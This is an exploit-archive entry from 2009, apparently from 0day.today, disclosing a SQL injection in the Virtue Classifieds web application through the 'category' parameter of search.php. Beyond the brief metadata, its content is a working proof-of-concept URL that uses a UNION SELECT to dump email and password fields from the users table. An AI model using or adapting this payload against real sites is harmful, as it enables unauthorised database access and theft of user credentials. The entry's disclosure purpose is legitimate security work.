Virtue Classifieds (category) SQL Injection Vulnerability

2009-06-08T00:00:00
ID 1337DAY-ID-5322
Type zdt
Reporter OzX
Modified 2009-06-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Virtue Classifieds (category) SQL Injection Vulnerability
=========================================================


#################################################################################################################################################

CMS : Virtue Classifieds
WEB : http://www.virtuenetz.com/classified/
Archivo : search.php
Variable Tipo : GET
Valor : category
Tipo : SQL Injection
Url : http:/www.site.com/search.php?category=[SQLI]

PoC:

http:/www.site.com/search.php?category=2+and+1=0+union+select+all+1,2,concat_ws(0x3A,email,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--


##################################################################################################################################################



#  0day.today [2018-01-02]  #